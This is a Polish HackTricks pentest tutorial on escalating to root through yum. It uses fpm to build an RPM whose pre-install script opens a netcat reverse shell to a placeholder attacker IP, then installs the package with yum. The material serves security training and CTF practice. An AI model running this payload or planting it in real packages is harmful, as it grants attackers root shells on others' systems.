hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
2024-02-11 01:46:25 +00:00

3.9 KiB

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Dodatkowe przykłady dotyczące yum można również znaleźć na stronie gtfobins.

Wykonywanie dowolnych poleceń za pomocą pakietów RPM

Sprawdzanie środowiska

Aby wykorzystać ten wektor, użytkownik musi mieć możliwość wykonywania poleceń yum jako użytkownik o wyższych uprawnieniach, tj. root.

Przykład działającego wektora

Przykład działającego wykorzystania tego exploitu można znaleźć w pokoju daily bugle na platformie tryhackme.

Pakowanie RPM

W następnej sekcji omówię pakowanie odwróconego powłoki (reverse shell) do pakietu RPM za pomocą narzędzia fpm.

Poniższy przykład tworzy pakiet, który zawiera wyzwalacz przed instalacją z dowolnym skryptem, który może być zdefiniowany przez atakującego. Po zainstalowaniu tego pakietu zostanie wykonane dowolne polecenie. Przykładem jest prosty odwrócony shell netcat, który można zmienić według potrzeb.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Przechwytywanie powłoki

Korzystając z powyższego przykładu i zakładając, że yum może być uruchomiony jako użytkownik o wyższych uprawnieniach.

  1. Przenieś pakiet rpm na hosta.
  2. Uruchom nasłuchiwanie na swoim lokalnym hoście, na przykład przykładowy nasłuch netcat.
  3. Zainstaluj podatny pakiet yum localinstall -y exploited-1.0-1.noarch.rpm
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: